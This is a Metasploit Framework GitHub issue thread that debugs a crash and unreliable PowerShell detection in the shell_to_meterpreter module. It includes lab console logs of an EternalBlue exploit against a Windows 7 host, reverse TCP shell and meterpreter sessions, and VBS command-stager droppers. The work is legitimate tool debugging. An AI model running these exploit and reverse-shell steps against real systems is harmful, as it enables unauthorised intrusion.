### ISSUE TITLE
shell_to_meterpreter - block in cleanup_handler: uninitialized constant [...] MetasploitModule::HANDLE_TIMEOUT

### ISSUE THREAD

**Issue by bcoles** [rapid7/metasploit-framework#8725]
*post/multi/manage/shell_to_meterpreter* throws `uninitialized constant Msf::Modules::Mod706f73742f6d756c74692f6d616e6167652f7368656c6c5f746f5f6d65746572707265746572::MetasploitModule::HANDLE_TIMEOUT` when attempting to convert a shell session to a meterpreter session on Windows.

👍  Sometimes this is ok and the session is upgraded.

👎 Sometimes it decides that powershell is not present, tries to use VBS, and fails.

👎 One in every ~10 attempts **causes msfconsole to die**.

Tested on Kali 2017 Rolling, Ruby 2.4.1, Metasploit master. Victim host is Windows 7 SP1 popped with MS17-010.

The following console output demonstrates these three scenarios. Note that while the module is executed multiple times for demonstration purposes, this does not appear to have any influence on the crash. Sometimes msfconsole will crash on the first try.

```
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.15.1-dev-9775df1f6e               ]
+ -- --=[ 1673 exploits - 958 auxiliary - 294 post        ]
+ -- --=[ 487 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > set rhost 172.16.137.133
rhost => 172.16.137.133
msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.137.130:4444 
[*] 172.16.137.133:445 - Connecting to target for exploitation.
[+] 172.16.137.133:445 - Connection established for exploitation.
[+] 172.16.137.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.137.133:445 - CORE raw buffer dump (42 bytes)
[*] 172.16.137.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 172.16.137.133:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 172.16.137.133:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 172.16.137.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.137.133:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.137.133:445 - Sending all but last fragment of exploit packet
[*] 172.16.137.133:445 - Starting non-paged pool grooming
[+] 172.16.137.133:445 - Sending SMBv2 buffers
[+] 172.16.137.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.137.133:445 - Sending final SMBv2 buffers.
[*] 172.16.137.133:445 - Sending last fragment of exploit packet!
[*] 172.16.137.133:445 - Receiving response from exploit packet
[+] 172.16.137.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.137.133:445 - Sending egg to corrupted connection.
[*] 172.16.137.133:445 - Triggering free of corrupted buffer.
[-] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.137.133:445 - Connecting to target for exploitation.
[+] 172.16.137.133:445 - Connection established for exploitation.
[+] 172.16.137.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.137.133:445 - CORE raw buffer dump (42 bytes)
[*] 172.16.137.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 172.16.137.133:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 172.16.137.133:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 172.16.137.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.137.133:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.137.133:445 - Sending all but last fragment of exploit packet
[*] 172.16.137.133:445 - Starting non-paged pool grooming
[+] 172.16.137.133:445 - Sending SMBv2 buffers
[+] 172.16.137.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.137.133:445 - Sending final SMBv2 buffers.
[*] 172.16.137.133:445 - Sending last fragment of exploit packet!
[*] 172.16.137.133:445 - Receiving response from exploit packet
[+] 172.16.137.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.137.133:445 - Sending egg to corrupted connection.
[*] 172.16.137.133:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (172.16.137.130:4444 -> 172.16.137.133:51105) at 2017-07-15 00:02:07 -0400
[+] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.137.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>^Z
Background session 1? [y/N]  y

msf exploit(ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > set session 1
session => 1
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[-] Post failed: NameError uninitialized constant Msf::Modules::Mod706f73742f6d756c74692f6d616e6167652f7368656c6c5f746f5f6d65746572707265746572::MetasploitModule::HANDLE_TIMEOUT
[-] Call stack:
[-]   /pentest/exploits/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:267:in `block in cleanup_handler'
[-]   /pentest/exploits/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133

msf post(shell_to_meterpreter) > [*] Meterpreter session 2 opened (172.16.137.130:4433 -> 172.16.137.133:51116) at 2017-07-15 00:02:28 -0400

msf post(shell_to_meterpreter) > sessions -k 2
[*] Killing the following session(s): 2
[*] Killing session 2
[*] 172.16.137.133 - Meterpreter session 2 closed.
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
[*] Command stager progress: 6.66% (6796/102108 bytes)
[*] Command stager progress: 8.32% (8495/102108 bytes)
[*] Command stager progress: 9.98% (10194/102108 bytes)
[*] Command stager progress: 11.65% (11893/102108 bytes)
[*] Command stager progress: 13.31% (13592/102108 bytes)
[*] Command stager progress: 14.98% (15291/102108 bytes)
[*] Command stager progress: 16.64% (16990/102108 bytes)
[*] Command stager progress: 18.30% (18689/102108 bytes)
[*] Command stager progress: 19.97% (20388/102108 bytes)
[*] Command stager progress: 21.63% (22087/102108 bytes)
[*] Command stager progress: 23.29% (23786/102108 bytes)
[*] Command stager progress: 24.96% (25485/102108 bytes)
[*] Command stager progress: 26.62% (27184/102108 bytes)
[*] Command stager progress: 28.29% (28883/102108 bytes)
[*] Command stager progress: 29.95% (30582/102108 bytes)
[*] Command stager progress: 31.61% (32281/102108 bytes)
[*] Command stager progress: 33.28% (33980/102108 bytes)
[*] Command stager progress: 34.94% (35679/102108 bytes)
[*] Command stager progress: 36.61% (37378/102108 bytes)
[*] Command stager progress: 38.27% (39077/102108 bytes)
[*] Command stager progress: 39.93% (40776/102108 bytes)
[*] Command stager progress: 41.60% (42475/102108 bytes)
[*] Command stager progress: 43.26% (44174/102108 bytes)
[*] Command stager progress: 44.93% (45873/102108 bytes)
[*] Command stager progress: 46.59% (47572/102108 bytes)
[*] Command stager progress: 48.25% (49271/102108 bytes)
[*] Command stager progress: 49.92% (50970/102108 bytes)
[*] Command stager progress: 51.58% (52669/102108 bytes)
[*] Command stager progress: 53.25% (54368/102108 bytes)
[*] Command stager progress: 54.91% (56067/102108 bytes)
[*] Command stager progress: 56.57% (57766/102108 bytes)
[*] Command stager progress: 58.24% (59465/102108 bytes)
[*] Command stager progress: 59.90% (61164/102108 bytes)
[*] Command stager progress: 61.57% (62863/102108 bytes)
[*] Command stager progress: 63.23% (64562/102108 bytes)
[*] Command stager progress: 64.89% (66261/102108 bytes)
[*] Command stager progress: 66.56% (67960/102108 bytes)
[*] Command stager progress: 68.22% (69659/102108 bytes)
[*] Command stager progress: 69.88% (71358/102108 bytes)
[*] Command stager progress: 71.55% (73057/102108 bytes)
[*] Command stager progress: 73.21% (74756/102108 bytes)
[*] Command stager progress: 74.88% (76455/102108 bytes)
[*] Command stager progress: 76.54% (78154/102108 bytes)
[*] Command stager progress: 78.20% (79853/102108 bytes)
[*] Command stager progress: 79.87% (81552/102108 bytes)
[*] Command stager progress: 81.53% (83251/102108 bytes)
[*] Command stager progress: 83.20% (84950/102108 bytes)
[*] Command stager progress: 84.86% (86649/102108 bytes)
[*] Command stager progress: 86.52% (88348/102108 bytes)
[*] Command stager progress: 88.19% (90047/102108 bytes)
[*] Command stager progress: 89.85% (91746/102108 bytes)
[*] Command stager progress: 91.52% (93445/102108 bytes)
[*] Command stager progress: 93.18% (95144/102108 bytes)
[*] Command stager progress: 94.84% (96843/102108 bytes)
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[-] Error: Unable to execute the following command: "echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\\DTXFv.vbs & echo End If >>%TEMP%\\DTXFv.vbs & echo End Function >>%TEMP%\\DTXFv.vbs & cscript //nologo %TEMP%\\DTXFv.vbs & del %TEMP%\\DTXFv.vbs & del %TEMP%\\jHJIl.b64"
[-] Output: "C:\\Windows\\TEMP\\DTXFv.vbs(13, 1) (null): 0x800700D8"
[*] Post module execution completed
[*] Stopping exploit/multi/handler
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[-] Post failed: NameError uninitialized constant Msf::Modules::Mod706f73742f6d756c74692f6d616e6167652f7368656c6c5f746f5f6d65746572707265746572::MetasploitModule::HANDLE_TIMEOUT
[-] Call stack:
[-]   /pentest/exploits/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:267:in `block in cleanup_handler'
[-]   /pentest/exploits/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 3 opened (172.16.137.130:4433 -> 172.16.137.133:51154) at 2017-07-15 00:03:47 -0400

msf post(shell_to_meterpreter) > sessions -k 3
[*] Killing the following session(s): 3
[*] Killing session 3
[*] 172.16.137.133 - Meterpreter session 3 closed.
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
[*] Command stager progress: 6.66% (6796/102108 bytes)
[*] Command stager progress: 8.32% (8495/102108 bytes)
[*] Command stager progress: 9.98% (10194/102108 bytes)
[*] Command stager progress: 11.65% (11893/102108 bytes)
[*] Command stager progress: 13.31% (13592/102108 bytes)
[*] Command stager progress: 14.98% (15291/102108 bytes)
[*] Command stager progress: 16.64% (16990/102108 bytes)
[*] Command stager progress: 18.30% (18689/102108 bytes)
[*] Command stager progress: 19.97% (20388/102108 bytes)
[*] Command stager progress: 21.63% (22087/102108 bytes)
[*] Command stager progress: 23.29% (23786/102108 bytes)
[*] Command stager progress: 24.96% (25485/102108 bytes)
[*] Command stager progress: 26.62% (27184/102108 bytes)
[*] Command stager progress: 28.29% (28883/102108 bytes)
[*] Command stager progress: 29.95% (30582/102108 bytes)
[*] Command stager progress: 31.61% (32281/102108 bytes)
[*] Command stager progress: 33.28% (33980/102108 bytes)
[*] Command stager progress: 34.94% (35679/102108 bytes)
[*] Command stager progress: 36.61% (37378/102108 bytes)
[*] Command stager progress: 38.27% (39077/102108 bytes)
[*] Command stager progress: 39.93% (40776/102108 bytes)
[*] Command stager progress: 41.60% (42475/102108 bytes)
[*] Command stager progress: 43.26% (44174/102108 bytes)
[*] Command stager progress: 44.93% (45873/102108 bytes)
[*] Command stager progress: 46.59% (47572/102108 bytes)
[*] Command stager progress: 48.25% (49271/102108 bytes)
[*] Command stager progress: 49.92% (50970/102108 bytes)
[*] Command stager progress: 51.58% (52669/102108 bytes)
[*] Command stager progress: 53.25% (54368/102108 bytes)
[*] Command stager progress: 54.91% (56067/102108 bytes)
[*] Command stager progress: 56.57% (57766/102108 bytes)
[*] Command stager progress: 58.24% (59465/102108 bytes)
[*] Command stager progress: 59.90% (61164/102108 bytes)
[*] Command stager progress: 61.57% (62863/102108 bytes)
[*] Command stager progress: 63.23% (64562/102108 bytes)
[*] Command stager progress: 64.89% (66261/102108 bytes)
[*] Command stager progress: 66.56% (67960/102108 bytes)
[*] Command stager progress: 68.22% (69659/102108 bytes)
[*] Command stager progress: 69.88% (71358/102108 bytes)
[*] Command stager progress: 71.55% (73057/102108 bytes)
[*] Command stager progress: 73.21% (74756/102108 bytes)
[*] Command stager progress: 74.88% (76455/102108 bytes)
[*] Command stager progress: 76.54% (78154/102108 bytes)
[*] Command stager progress: 78.20% (79853/102108 bytes)
[*] Command stager progress: 79.87% (81552/102108 bytes)
[*] Command stager progress: 81.53% (83251/102108 bytes)
[*] Command stager progress: 83.20% (84950/102108 bytes)
[*] Command stager progress: 84.86% (86649/102108 bytes)
[*] Command stager progress: 86.52% (88348/102108 bytes)
[*] Command stager progress: 88.19% (90047/102108 bytes)
[*] Command stager progress: 89.85% (91746/102108 bytes)
[*] Command stager progress: 91.52% (93445/102108 bytes)
[*] Command stager progress: 93.18% (95144/102108 bytes)
[*] Command stager progress: 94.84% (96843/102108 bytes)
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[-] Error: Unable to execute the following command: "echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\\jngkv.vbs & echo End If >>%TEMP%\\jngkv.vbs & echo End Function >>%TEMP%\\jngkv.vbs & cscript //nologo %TEMP%\\jngkv.vbs & del %TEMP%\\jngkv.vbs & del %TEMP%\\AliyK.b64"
[-] Output: "C:\\Windows\\TEMP\\jngkv.vbs(13, 1) (null): 0x800700D8"
[*] Post module execution completed
[*] Stopping exploit/multi/handler
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Post module execution completed
/pentest/exploits/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:267:in `block in cleanup_handler': uninitialized constant Msf::Modules::Mod706f73742f6d756c74692f6d616e6167652f7368656c6c5f746f5f6d65746572707265746572::MetasploitModule::HANDLE_TIMEOUT (NameError)
	from /pentest/exploits/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
root@network:/pentest/exploits/metasploit-framework# 
```

**Comment by sempervictus** [comment]
@bcoles: can you run the upstream version of have_powershell? Or whatever method that code uses manually a few times an ping back on this thread? I don't use shell much on windows, so haven't run into this yet.
We probably want to catch and rescue the exception, but only after we do the RCA since it'll still break the session and possibly leave footprints in the process table.

**Comment by busterb** [comment]
I suspect this is due to the global thread abort behavior rubydns has. Probably need to update the gemfile for now to point to https://github.com/alexdalitz/dnsruby since it has the fix:

Can you add this to your Gemfile and run `bundle`

`gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'`

**Comment by bcoles** [comment]
@busterb that appears to have resolved the `HANDLE_TIMEOUT` issue. The exception is no longer raised, and msfconsole lives. No deaths after 10+ runs.

**Comment by bcoles** [comment]
The `Powershell is not installed on the target.` error still exists, causing a fallback to VBS (which fails).

@sempervictus I wrote the following test module and ran some experiments. The results are similar to the issues I've been facing in #8721 indicating that there may be a larger underlying issue with either the way command buffering and/or channels are implemented which reveals itself in both post modules and local exploit modules.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'
require 'msf/core/post/windows/powershell'

class MetasploitModule < Msf::Post
  include Exploit::Powershell
  include Post::Windows::Powershell

  def initialize(info = {})
    super(update_info(info,
        'Name'          => 'test',
        'Description'   => %q{
          test
        },
        'License'       => MSF_LICENSE,
        'Author'        => ['test'],
        'Platform'      => [ 'linux', 'osx', 'unix', 'solaris', 'bsd', 'windows' ],
        'SessionTypes'  => [ 'shell' ]
      ))
    register_options(
      [
        OptAddressLocal.new('LHOST',
          [false, 'IP of host that will receive the connection from the payload (Will try to auto detect).', nil]),
        OptInt.new('LPORT',
          [true, 'Port for payload to connect to.', 4433]),
        OptBool.new('HANDLER',
          [ true, 'Start an exploit/multi/handler to receive the connection', true])
      ])
    deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
  end

  def run
100.times do |i|
      if session.type == 'powershell'
        echo 'already powershell'
      else 
        if (have_powershell?)
          print_good 'yes'
        else
          print_error 'no'
        end
      end
end
    return nil
  end
end

```

Output as follows:

```
msf post(test) > set session 4
session => 4
msf post(test) > run
    
[-] no
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run

^[[A[+] yes
[*] Post module execution completed

msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run
^[[A
[+] yes
[*] Post module execution completed

msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run
^[[A
[+] yes
[*] Post module execution completed

msf post(test) > run
^[[A
[+] yes
[*] Post module execution completed

msf post(test) > run
^[[A
[+] yes
[*] Post module execution completed

msf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run
^[[A
[+] yes
[*] Post module execution completed

msf post(test) > run
^[[A

[+] yes
[*] Post module execution completed
msf post(test) > run
^[[A

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > reload
[*] Reloading module...
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > echo 'ok, lets try doing 100 times'
[*] exec: echo 'ok, lets try doing 100 times'

ok, lets try doing 100 times
msf post(test) > reload
[*] Reloading module...
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[*] Post module execution completed
msf post(test) > reload
[*] Reloading module...
run
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
^[[Amsf post(test) > run

[+] yes
^[[A[*] Post module execution completed

msf post(test) > run

[+] yes
^[[A
[*] Post module execution completed
msf post(test) > run

[+] yes
^[[A
[*] Post module execution completed
msf post(test) > run
^[[A
[+] yes

[*] Post module execution completed
msf post(test) > run
^[[A
[+] yes

[*] Post module execution completed
msf post(test) > run
^[[A

[+] yes
[*] Post module execution completed
^[[A
msf post(test) > run
^[[A
[+] yes

[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > reload
[*] Reloading module...
run
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > run

[+] yes
[*] Post module execution completed
msf post(test) > rexploit 
[*] Reloading module...

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > rexploit 
[*] Reloading module...

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > rexploit 
[*] Reloading module...


[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > rexploit 
[*] Reloading module...

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > reload
[*] Reloading module...
runmsf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > set session 4
session => 4
rmsf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
[*] Powershell command length: 5443
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 9 opened (172.16.137.130:4433 -> 172.16.137.133:49425) at 2017-07-15 22:00:57 -0400

msf post(shell_to_meterpreter) > sessions -k 9
[*] Killing the following session(s): 9
[*] Killing session 9
[*] 172.16.137.133 - Meterpreter session 9 closed.
msf post(shell_to_meterpreter) > use post/multi/manage/test 
msf post(test) > run

[-] no
[-] no
[-] no
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
[*] Powershell command length: 5507
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 10 opened (172.16.137.130:4433 -> 172.16.137.133:49434) at 2017-07-15 22:02:21 -0400

msf post(shell_to_meterpreter) > sessions -k 10
[*] Killing the following session(s): 10
[*] Killing session 10
[*] 172.16.137.133 - Meterpreter session 10 closed.
msf post(shell_to_meterpreter) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
[*] Transfer method: VBS [fallback]
[*] Starting transfer...
^C[*] Cleaning up handler
[*] Post module execution completed
[*] Stopping exploit/multi/handler
msf post(shell_to_meterpreter) > use post/multi/manage/test
rmsf post(test) > run

[-] no
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
